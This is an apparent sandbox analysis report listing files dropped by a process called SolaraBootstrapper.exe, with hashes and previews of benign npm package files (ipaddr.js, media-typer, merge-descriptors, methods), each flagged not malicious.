                                                  Size (bytes):8309
                                                  Entropy (8bit):5.118444636087176
                                                  Encrypted:false
                                                  SSDEEP:192:VpD/igBoQXO84nmgyFnc5qYldSmHSSXzi:VpLDXkhYc5qYl8RSDi
                                                  MD5:6782F9A6ACCF829084C303895A2C26A9
                                                  SHA1:E1553F0D26581F4312008A49B40EF8D0B0E4697E
                                                  SHA-256:025B1282FBBC2F7F270E08B29414B7BBDE469284564477F38B3519446AA16220
                                                  SHA-512:5F882221434E7DE8140DC02ECB9A26E3D4967D8A38355D3E6BCDE725EE301133AC4C977180196D4F7741D8D51C303EF004E22B5AEE163A9AC3C3284F452529E4
                                                  Malicious:false
                                                  Preview:# ipaddr.js . an IPv6 and IPv4 address manipulation library [![Build Status](https://travis-ci.org/whitequark/ipaddr.js.svg)](https://travis-ci.org/whitequark/ipaddr.js)..ipaddr.js is a small (1.9K minified and gzipped) library for manipulating.IP addresses in JavaScript environments. It runs on both CommonJS runtimes.(e.g. [nodejs]) and in a web browser...ipaddr.js allows you to verify and parse string representation of an IP.address, match it against a CIDR range or range list, determine if it falls.into some reserved ranges (examples include loopback and private ranges),.and convert between IPv4 and IPv4-mapped IPv6 addresses...[nodejs]: http://nodejs.org..## Installation..`npm install ipaddr.js`..or..`bower install ipaddr.js`..## API..ipaddr.js defines one object in the global scope: `ipaddr`. In CommonJS,.it is exported from the module:..```js.var ipaddr = require('ipaddr.js');.```..The API consists of several global methods and two classes: ipaddr.IPv6 and ipaddr.IPv4...### Glo
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (9738), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):9738
                                                  Entropy (8bit):5.376548087766361
                                                  Encrypted:false
                                                  SSDEEP:192:sr++pWF8arWiasLV17s5W/KG1xZQ19asIBdh9yNyuEuSyj+CShTJ9W:srppWF8arasLV17s5W/ZxZQ10sIBdh9k
                                                  MD5:25CBB7A40252E3E2004437B72E1EAEE5
                                                  SHA1:9ABB27F31A6AF75D8FEDC6B97A0FFADC87238CE6
                                                  SHA-256:AB95215C182A1BEA49617080DC12E52E3E80521894C37CE0478B69326C151440
                                                  SHA-512:3E309D7B0D16AB26DD9D68628B57E5D77A462AD044644B2FB3B63BF095BB68D5851D97A6336E7BC31550C64B67577BBCA94EA2FEA70EA9654F9DE50BFA80AC5B
                                                  Malicious:false
                                                  Preview:(function(){var r,t,n,e,i,o,a,s;t={},s=this,"undefined"!=typeof module&&null!==module&&module.exports?module.exports=t:s.ipaddr=t,a=function(r,t,n,e){var i,o;if(r.length!==t.length)throw new Error("ipaddr: cannot match CIDR for objects with different lengths");for(i=0;e>0;){if((o=n-e)<0&&(o=0),r[i]>>o!=t[i]>>o)return!1;e-=n,i+=1}return!0},t.subnetMatch=function(r,t,n){var e,i,o,a,s;null==n&&(n="unicast");for(o in t)for(!(a=t[o])[0]||a[0]instanceof Array||(a=[a]),e=0,i=a.length;e<i;e++)if(s=a[e],r.kind()===s[0].kind()&&r.match.apply(r,s))return o;return n},t.IPv4=function(){function r(r){var t,n,e;if(4!==r.length)throw new Error("ipaddr: ipv4 octet count should be 4");for(t=0,n=r.length;t<n;t++)if(!(0<=(e=r[t])&&e<=255))throw new Error("ipaddr: ipv4 octet should fit in 8 bits");this.octets=r}return r.prototype.kind=function(){return"ipv4"},r.prototype.toString=function(){return this.octets.join(".")},r.prototype.toNormalizedString=function(){return this.toString()},r.prototype.toByteArr
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):19333
                                                  Entropy (8bit):4.760426115216821
                                                  Encrypted:false
                                                  SSDEEP:384:XOIhcv8um6YjHQ70ppf303ybmQuUuMZOZledj4L4:tWvbm62xDv03ybmQuy2ledj4L4
                                                  MD5:FAEA7806284886C6C63A41C247008FBD
                                                  SHA1:70EF5F22C1EAD35BD5221F3AB47EBD6820EED342
                                                  SHA-256:D82A21A6872925DFE73E9AA10E9EB47BABA398987560E36DB107F44D92F069B0
                                                  SHA-512:687E9584947414688215B519BA9D3BE4A75326B47AF66C3815900294F98B3C2A43161C67B91167CE9CEDFA2DAB8923BA31E9361BD7C6314C7F2685475C0EE5B1
                                                  Malicious:false
                                                  Preview:(function() {. var expandIPv6, ipaddr, ipv4Part, ipv4Regexes, ipv6Part, ipv6Regexes, matchCIDR, root, zoneIndex;.. ipaddr = {};.. root = this;.. if ((typeof module !== "undefined" && module !== null) && module.exports) {. module.exports = ipaddr;. } else {. root['ipaddr'] = ipaddr;. }.. matchCIDR = function(first, second, partSize, cidrBits) {. var part, shift;. if (first.length !== second.length) {. throw new Error("ipaddr: cannot match CIDR for objects with different lengths");. }. part = 0;. while (cidrBits > 0) {. shift = partSize - cidrBits;. if (shift < 0) {. shift = 0;. }. if (first[part] >> shift !== second[part] >> shift) {. return false;. }. cidrBits -= partSize;. part += 1;. }. return true;. };.. ipaddr.subnetMatch = function(address, rangeList, defaultName) {. var k, len, rangeName, rangeSubnets, subnet;. if (defaultName == null) {. defaultName = 'unicast';. }. for (ra
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:C++ source, ASCII text
                                                  Category:dropped
                                                  Size (bytes):2959
                                                  Entropy (8bit):4.638206496270271
                                                  Encrypted:false
                                                  SSDEEP:48:gztch7yL4qOS8GWHBBJr+Gtf8SuieGrzaU8SNfx+40Whb:6tcNywS8GWHBBJr+wf8STeGrzaU8SNfX
                                                  MD5:69FE76ECEC2EB98CD45F17EC7DC7393B
                                                  SHA1:F99EAAD680E2CDB0C60D67FDC17DB35E62310153
                                                  SHA-256:662A75272462317059315F3028452DC8044F752AD0B6B61C084A7AE3EEB0F775
                                                  SHA-512:854EE0C571B61A4DF5DB9E6257FC5B5954F44C96AFADE795BEB40D2F57459BCA8654897C5EDAE633AA3E3B7CC253F035FDE867BE39963D9D33762AA0C023E2FE
                                                  Malicious:false
                                                  Preview:declare module "ipaddr.js" {. type IPv4Range = 'unicast' | 'unspecified' | 'broadcast' | 'multicast' | 'linkLocal' | 'loopback' | 'carrierGradeNat' | 'private' | 'reserved';. type IPv6Range = 'unicast' | 'unspecified' | 'linkLocal' | 'multicast' | 'loopback' | 'uniqueLocal' | 'ipv4Mapped' | 'rfc6145' | 'rfc6052' | '6to4' | 'teredo' | 'reserved';.. interface RangeList<T> {. [name: string]: [T, number] | [T, number][];. }.. // Common methods/properties for IPv4 and IPv6 classes.. class IP {. prefixLengthFromSubnetMask(): number | null;. toByteArray(): number[];. toNormalizedString(): string;. toString(): string;. }.. namespace Address {. export function isValid(addr: string): boolean;. export function fromByteArray(bytes: number[]): IPv4 | IPv6;. export function parse(addr: string): IPv4 | IPv6;. export function parseCIDR(mask: string): [IPv4 | IPv6, number];. export function process(addr: strin
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):719
                                                  Entropy (8bit):4.783962360583112
                                                  Encrypted:false
                                                  SSDEEP:12:yh8co1QMcFsvP5R6yrd9UJSCpxIeXLNdCjWjVDZAkTc3V0wi1020O6XdPN68n:sg1QM0svh5R2ECEe7NVb2mmRn
                                                  MD5:17BC176C8D78F76C5E70CAD7BA16A598
                                                  SHA1:532BE044CE57A9F81FED35F3742767F587CFBC95
                                                  SHA-256:FC1071893728A0E78FA40CE0DBE04C5A1021179FDCB5B229F274E3556D6A87CD
                                                  SHA-512:E2D7731224DC5FE287B5E2FD4FA7EE713A082D66BD802FE38ABA0FCB6C6F1968E29C573A0C77258DBD229FFC2CF3A14FE2DC517892E5336B8B73ED0B5114A6C7
                                                  Malicious:false
                                                  Preview:{. "name": "ipaddr.js",. "description": "A library for manipulating IPv4 and IPv6 addresses in JavaScript.",. "version": "1.9.1",. "author": "whitequark <whitequark@whitequark.org>",. "directories": {. "lib": "./lib". },. "dependencies": {},. "devDependencies": {. "coffee-script": "~1.12.6",. "nodeunit": "^0.11.3",. "uglify-js": "~3.0.19". },. "scripts": {. "test": "cake build test". },. "files": [. "lib/",. "LICENSE",. "ipaddr.min.js". ],. "keywords": [. "ip",. "ipv4",. "ipv6". ],. "repository": "git://github.com/whitequark/ipaddr.js",. "main": "./lib/ipaddr.js",. "engines": {. "node": ">= 0.10". },. "license": "MIT",. "types": "./lib/ipaddr.js.d.ts".}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):461
                                                  Entropy (8bit):4.6244103901918
                                                  Encrypted:false
                                                  SSDEEP:6:Oo08SzVQ6Fm2jX6azWvYFMaxF8t5IMwSZz4Xv1eC72Xv18XS+5/LWlIaMCEoE9:OJ8GnEsaQmtH/wWzCvcC78vWL58KB
                                                  MD5:370BE51F8776B7E79B16228F7DC6762A
                                                  SHA1:5912252F83CDA3E2A5741F2CD2593EFA95EC5DD0
                                                  SHA-256:739DE29408B3F06851637FEF507F1B42F584725E547C272CF19929D5F568CBC2
                                                  SHA-512:84131335673FC56A8E78BCA0207124CB1DFB05DC88B3AEDBDFF3A7BB126DCBE55BC2BF8144D6342605107F6DDAD3E52B06607167638ED761EABF77A955BA175C
                                                  Malicious:false
                                                  Preview:0.3.0 / 2014-09-07.==================.. * Support Node.js 0.6. * Throw error when parameter format invalid on parse..0.2.0 / 2014-06-18.==================.. * Add `typer.format()` to format media types..0.1.0 / 2014-06-17.==================.. * Accept `req` as argument to `parse`. * Accept `res` as argument to `parse`. * Parse media type with extra LWS between type and first parameter..0.0.0 / 2014-06-13.==================.. * Initial implementation.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1089
                                                  Entropy (8bit):5.104507231535383
                                                  Encrypted:false
                                                  SSDEEP:24:5iJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:5iJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:C6E0CE1E688C5FF16DB06B7259E9CD20
                                                  SHA1:6EABBF0405809A1FCCACB1B08CE5CF34AD97E980
                                                  SHA-256:74D8054D56D522BDAA340D3D71130CB204997D523A5292C85AC1264DD77C8D06
                                                  SHA-512:9A1510C25D4B6268ED349107857966AEE665ECBDAFB447341915D0C965F735D59725BD253BF361CF65E99DD166DBE9D9F1059E455C78B406CF4783D2DBA45362
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014 Douglas Christopher Wilson..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,.TORT OR OTHERWISE, ARISING FROM,
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2371
                                                  Entropy (8bit):5.06717829280703
                                                  Encrypted:false
                                                  SSDEEP:48:PqXC9RRlZ+Jc+4+K+7yy+A+WsJ2czvJfUluJe2eontoRYo7WTj7m7oyAYyotH:CXCkc+Nq2GxfUweutaYkWTv6NyKH
                                                  MD5:6E254E8CCC8CE7EAF9CDD8E5852D7BDF
                                                  SHA1:7899A1B0B168A36A0933D91ED9C3E399751A8D9C
                                                  SHA-256:12B47B8B2E2A0F70289B2F3FD9F810422F918B78024E0019E86C2C9BC4AF695A
                                                  SHA-512:2BFDC2AC9137B0DC157E56951707F3DC0FC3FA8D721D84F891B0987CC456008BF6C29AE5DEDEAC965433BD782DBFE246119035B9714F34F526D1335EED117088
                                                  Malicious:false
                                                  Preview:# media-typer..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Node.js Version][node-version-image]][node-version-url].[![Build Status][travis-image]][travis-url].[![Test Coverage][coveralls-image]][coveralls-url]..Simple RFC 6838 media type parser..## Installation..```sh.$ npm install media-typer.```..## API..```js.var typer = require('media-typer').```..### typer.parse(string)..```js.var obj = typer.parse('image/svg+xml; charset=utf-8').```..Parse a media type string. This will return an object with the following.properties (examples are shown for the string `'image/svg+xml; charset=utf-8'`):.. - `type`: The type of the media type (always lower case). Example: `'image'`.. - `subtype`: The subtype of the media type (always lower case). Example: `'svg'`.. - `suffix`: The suffix of the media type (always lower case). Example: `'xml'`.. - `parameters`: An object of the parameters in the media type (name of parameter always lower case). Example:
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):6375
                                                  Entropy (8bit):5.122672612037347
                                                  Encrypted:false
                                                  SSDEEP:96:Yn3wI5CTe4oajGzdxa3ua+60ZKVL/d45eyMqhhyINF+j0tstwz7sgH:Yn3N0Te4Hj8KJ+6/oRbycMYCwT
                                                  MD5:EF1845377CBBF76EDD411A370738ED2B
                                                  SHA1:CC79807E8585C09FB195FFB8CA37BBC04DC26708
                                                  SHA-256:27AF6DE782C53C57C4A8F111A81CD26B8D68C896C2DCD83E27DA4C73234CE16B
                                                  SHA-512:42AB06CB822A3C6949252B3945E962B0D343F0FD12492A8650C525733D2C9F7D6ED893E05922981DA05B92909600C6F2E42A75CBEFFBF14EB2B8ED167EB8D159
                                                  Malicious:false
                                                  Preview:/*!. * media-typer. * Copyright(c) 2014 Douglas Christopher Wilson. * MIT Licensed. */../**. * RegExp to match *( ";" parameter ) in RFC 2616 sec 3.7. *. * parameter = token "=" ( token | quoted-string ). * token = 1*<any CHAR except CTLs or separators>. * separators = "(" | ")" | "<" | ">" | "@". * | "," | ";" | ":" | "\" | <">. * | "/" | "[" | "]" | "?" | "=". * | "{" | "}" | SP | HT. * quoted-string = ( <"> *(qdtext | quoted-pair ) <"> ). * qdtext = <any TEXT except <">>. * quoted-pair = "\" CHAR. * CHAR = <any US-ASCII character (octets 0 - 127)>. * TEXT = <any OCTET except CTLs, but including LWS>. * LWS = [CRLF] 1*( SP | HT ). * CRLF = CR LF. * CR = <US-ASCII CR, carriage return (13)>. * LF = <US-ASCII LF, linefeed (10)>. * SP = <US-ASCII SP, space (32)>. * SHT = <US-ASCII HT, horizontal-tab (9)>. * CTL = <any US-ASCII control
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):759
                                                  Entropy (8bit):4.862415517696567
                                                  Encrypted:false
                                                  SSDEEP:12:be7pH1HQDLCUqWV1JktPRGCjPGWjVSYMiPOyZiPjXy8enYMw:S7pH10LC/WTk9BmZy4y8e1w
                                                  MD5:127CE4ABEB265C6EEF7B45540241CA91
                                                  SHA1:866C9EA28A167B6800DA67CDBE18CC9F0EC5CBAB
                                                  SHA-256:8CCF875E488E700B79EC48386E2F47C51C5F26297EC74E5E4E5D92DC5D70EF30
                                                  SHA-512:BE57A51DC09DBA2DC139ACA8D445DA8B3798C420C2943F2097741AFD0DD14CB183561856B559D83ACFD5A3C2D6049A4BABD67258B23302270046ABEDABC55687
                                                  Malicious:false
                                                  Preview:{. "name": "media-typer",. "description": "Simple RFC 6838 media type parser and formatter",. "version": "0.3.0",. "author": "Douglas Christopher Wilson <doug@somethingdoug.com>",. "license": "MIT",. "repository": "jshttp/media-typer",. "devDependencies": {. "istanbul": "0.3.2",. "mocha": "~1.21.4",. "should": "~4.0.4". },. "files": [. "LICENSE",. "HISTORY.md",. "index.js". ],. "engines": {. "node": ">= 0.6". },. "scripts": {. "test": "mocha --reporter spec --check-leaks --bail test/",. "test-cov": "istanbul cover node_modules/mocha/bin/_mocha -- --reporter dot --check-leaks test/",. "test-travis": "istanbul cover node_modules/mocha/bin/_mocha --report lcovonly -- --reporter spec --check-leaks test/". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):363
                                                  Entropy (8bit):4.443514376022814
                                                  Encrypted:false
                                                  SSDEEP:6:SOtSYT4v/mTozlzD+jk2DCyqucPLh8S1VN/X3r1vhdUsj2:htTbQtkDHcPL5VNPbOf
                                                  MD5:ED8BAD35FDE048C49302F3138BC4EC7B
                                                  SHA1:1CFD5FEC0DC757A92E3A857B195F931316557BA7
                                                  SHA-256:95DC03EB48A629F2136BBB0D2427963E6AD71906CCD532B28074F438C5CC70AC
                                                  SHA-512:BF035C43D555562BDDEA1995FA697FBC71D9A3D371E8F0EC845759D528F01E350C33910FE8601D66D266C1FAF3A3FF97B0499DC80C5BCA101494DD42B5C8BD8E
                                                  Malicious:false
                                                  Preview:1.0.1 / 2016-01-17.==================.. * perf: enable strict mode..1.0.0 / 2015-03-01.==================.. * Add option to only add new descriptors. * Add simple argument validation. * Add jsdoc to source file..0.0.2 / 2013-12-14.==================.. * Move repository to `component` organization..0.0.1 / 2013-10-29.==================.. * Initial release.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1167
                                                  Entropy (8bit):5.176199836532222
                                                  Encrypted:false
                                                  SSDEEP:24:goiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:goiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:AAF57BA8C5C9BF256FEA7E943991A81A
                                                  SHA1:338F56A09453C79D1E5279C4E74C91CE678F5DCF
                                                  SHA-256:62FB7D7C1822FE783895866057247BBD50164B00631FCE9E4981D3897BDEE4D9
                                                  SHA-512:7747C49E266A69074F989DF742F451A2C4A6F303E412361CFC0C75100E6FB8E258085843E6C6F1CD9C529558556615D67C5778AA7DA2C7C58D49411E0DEA6D00
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2013 Jonathan Ong <me@jongleberry.com>.Copyright (c) 2015 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1213
                                                  Entropy (8bit):4.932959396495419
                                                  Encrypted:false
                                                  SSDEEP:24:kiPeqXSCARbAq4p4H3kr1xE5UxRQPgILAt+W6myAY+NJ7dor:BmqX8RbUyXkxkUxFw7mZYA2
                                                  MD5:92A3BCC5F7E8A33DE24B60BD6CA5C33F
                                                  SHA1:8A466525191DE1D001D572FF8A6918879C395C3C
                                                  SHA-256:ACE60D05B7AF34523EEFD407449E52F2B9EA33E26E212CF4F4B389CE60186320
                                                  SHA-512:730FECB727AF2AA7F2E5123C3CC17F8ED1526298FCE4C0979E16332143D0EEA9A080782299B986894A44C0792B154015BE00D9EA2F632B663E398F5F7C61802A
                                                  Malicious:false
                                                  Preview:# Merge Descriptors..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Build Status][travis-image]][travis-url].[![Test Coverage][coveralls-image]][coveralls-url]..Merge objects using descriptors...```js.var thing = {. get name() {. return 'jon'. }.}..var animal = {..}..merge(animal, thing)..animal.name === 'jon'.```..## API..### merge(destination, source)..Redefines `destination`'s descriptors with `source`'s...### merge(destination, source, false)..Defines `source`'s descriptors on `destination` if `destination` does not have.a descriptor by the same name...## License..[MIT](LICENSE)..[npm-image]: https://img.shields.io/npm/v/merge-descriptors.svg.[npm-url]: https://npmjs.org/package/merge-descriptors.[travis-image]: https://img.shields.io/travis/component/merge-descriptors/master.svg.[travis-url]: https://travis-ci.org/component/merge-descriptors.[coveralls-image]: https://img.shields.io/coveralls/component/merge-descriptors/master.svg.[
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1215
                                                  Entropy (8bit):4.792495369567698
                                                  Encrypted:false
                                                  SSDEEP:24:jUj+X3+kpAtBJ9H8qB83IYxoWFZPq/YFHEuiayAQ:jdXukGH9H7B4IYnZPKYFHZiaXQ
                                                  MD5:B4D3859E603602C87A45682862055AF0
                                                  SHA1:E95CB1C14D70BE457EBA2CE61B2F4E90A13B21B1
                                                  SHA-256:88564234B9EEB2F0FE2CC5D03F617A97EB4802F126BDD21AA223C3C87C02531C
                                                  SHA-512:B17BB8C8B652F27D8037ED60F28B0D19A68E77BCC45D1E2BE7DD304C942F6E85570E9720011F983FB8783D670EB66C0C3174D5FD90690B2AA79C2B402ADCD00A
                                                  Malicious:false
                                                  Preview:/*!. * merge-descriptors. * Copyright(c) 2014 Jonathan Ong. * Copyright(c) 2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module exports.. * @public. */..module.exports = merge../**. * Module variables.. * @private. */..var hasOwnProperty = Object.prototype.hasOwnProperty../**. * Merge the property descriptors of `src` into `dest`. *. * @param {object} dest Object to add descriptors to. * @param {object} src Object to clone descriptors from. * @param {boolean} [redefine=true] Redefine `dest` properties with `src` properties. * @returns {object} Reference to dest. * @public. */..function merge(dest, src, redefine) {. if (!dest) {. throw new TypeError('argument dest is required'). }.. if (!src) {. throw new TypeError('argument src is required'). }.. if (redefine === undefined) {. // Default to true. redefine = true. }.. Object.getOwnPropertyNames(src).forEach(function forEachOwnPropertyName(name) {. if (!redefine && hasOwnProperty.call(des
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):931
                                                  Entropy (8bit):4.836039258651588
                                                  Encrypted:false
                                                  SSDEEP:24:kVwAv1rGS+7UEGGQxVSAQeWPRZKly8e1xyy:kVw+rGT7Vd+VXQdPRojg9
                                                  MD5:570E06D8CE0167E07A32BA70FDD56795
                                                  SHA1:39DC652DFA419D46D6FED0835444C603C57077F8
                                                  SHA-256:45EBE570483C48B6460767FC4A0BB69E4DEE4BF4BECC645B0E0627172A30A580
                                                  SHA-512:9C8DDF41B3207016935AFFCE00108D87F176A9E473A01F03F1110456397C88EE2FBAF34F9E497E6CBFF2B65C4F4C7F254A5129B4C1EAA2B85FBEBFFB8FE43777
                                                  Malicious:false
                                                  Preview:{. "name": "merge-descriptors",. "description": "Merge objects using descriptors",. "version": "1.0.1",. "author": {. "name": "Jonathan Ong",. "email": "me@jongleberry.com",. "url": "http://jongleberry.com",. "twitter": "https://twitter.com/jongleberry". },. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Mike Grabowski <grabbou@gmail.com>". ],. "license": "MIT",. "repository": "component/merge-descriptors",. "devDependencies": {. "istanbul": "0.4.1",. "mocha": "1.21.5". },. "files": [. "HISTORY.md",. "LICENSE",. "README.md",. "index.js". ],. "scripts": {. "test": "mocha --reporter spec --bail --check-leaks test/",. "test-ci": "istanbul cover node_modules/mocha/bin/_mocha --report lcovonly -- --reporter spec --check-leaks test/",. "test-cov": "istanbul cover node_modules/mocha/bin/_mocha -- --reporter dot --check-leaks test/". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):427
                                                  Entropy (8bit):4.478113238217573
                                                  Encrypted:false
                                                  SSDEEP:6:SUdSYT4v/dub7TtSH5vU6oQ0S6lIl9lkdQcSSMhLvo4y9QUchAneAvn:dTpbUx83VlIlY2XvFwBDeKn
                                                  MD5:0355FB5E6662FFCDF19E5F736882F34D
                                                  SHA1:A6D25D5B55C605C66CA1652C61BEC0494505FA2F
                                                  SHA-256:4C23C63B7E97453A1517F474714EC21D6D590BFACE0961788EC748B800A4E789
                                                  SHA-512:446C14E1D21980C6D27A1E634047C7DE536F0FAAE5FD711646A39ED51A0469F18D0651629C957225C872932F8E4D772DF9D41BD914EF2889B5EB7F244823735E
                                                  Malicious:false
                                                  Preview:1.1.2 / 2016-01-17.==================.. * perf: enable strict mode..1.1.1 / 2014-12-30.==================.. * Improve `browserify` support..1.1.0 / 2014-07-05.==================.. * Add `CONNECT` method. .1.0.1 / 2014-06-02.==================.. * Fix module to work with harmony transform..1.0.0 / 2014-05-08.==================.. * Add `PURGE` method..0.1.0 / 2013-10-28.==================.. * Add `http.METHODS` support.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1180
                                                  Entropy (8bit):5.22582736815138
                                                  Encrypted:false
                                                  SSDEEP:24:M4iJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFz:RiJfxfPvGt7ICMPH+sfINi3OMFz
                                                  MD5:C16A7DD9F946172F07086576D135D9D3
                                                  SHA1:C5761D628A53F59EBFBADCA4EFF7150083D3EBD6
                                                  SHA-256:1DA7F0788D14D545B2B953F78A27B916D320DFA174C2FCFA124C5AAFFA81056E
                                                  SHA-512:44B976ADC2F8D1B6E87FED375E3AB8D6C155EE8BF73902690EA8891BB8E85EBC9917515F5C3F866B1037404C4A62BCFE83AD79AC5BFE57EBD3DD953176668F17
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2013-2014 TJ Holowaychuk <tj@vision-media.ca>.Copyright (c) 2015-2016 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMA
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1694
                                                  Entropy (8bit):5.025036562613654
                                                  Encrypted:false
                                                  SSDEEP:24:kyeqXSX240ARL2R47QX/KV6k2z/X1p32zZY2jc/HQCN/R+IAPWWW6mg+NgWoG:wqXC9RRLf72z/lB24qWW7mgAL
                                                  MD5:882A4DF2D7DC4B518FD3BB8C85E1C652
                                                  SHA1:4148C08077812690AEB399D0B063DF47BB2EA674
                                                  SHA-256:118D134E8BCD8B81D0A3596E0DED6D10372F9EC1E5DF5A5B8B4295923973C7F4
                                                  SHA-512:1403B308E281C31B278F04AA43ABF1B0EF377D8B6F2A5BE7FEA7F158446861E5FAC90B323734B81023467565B4771A197EF1B3F98E283F68410C62DE1E0917BC
                                                  Malicious:false
                                                  Preview:# Methods..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Node.js Version][node-version-image]][node-version-url].[![Build Status][travis-image]][travis-url].[![Test Coverage][coveralls-image]][coveralls-url]..HTTP verbs that Node.js core's HTTP parser supports...This module provides an export that is just like `http.METHODS` from Node.js core,.with the following differences:.. * All method names are lower-cased.. * Contains a fallback list of methods for Node.js versions that do not have a. `http.METHODS` export (0.10 and lower).. * Provides the fallback list when using tools like `browserify` without pulling. in the `http` shim module...## Install..```bash.$ npm install methods.```..## API..```js.var methods = require('methods').```..### methods..This is an array of lower-cased method names that Node.js supports. If Node.js.provides the `http.METHODS` export, then this is the same array lower-cased,.otherwise it is a snapshot of th
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1040
                                                  Entropy (8bit):4.856261055300312
                                                  Encrypted:false
                                                  SSDEEP:24:p+xR+nngR9AtBtQbZnTH18NHbdxMfLUKkS5ihLGiOtAKK:Mxk2a8ZnD1kd+fL9fihCtAKK
                                                  MD5:17D4A4BA378C1FD10DCFD061439F7EA0
                                                  SHA1:82EB55245F510E6CBC580F5CED1DC9D64D664D2A
                                                  SHA-256:670576BFE96EB9E4FECD1E8C19F491A68B9BFD7DA0E7564CD0A3C2EBD3839180
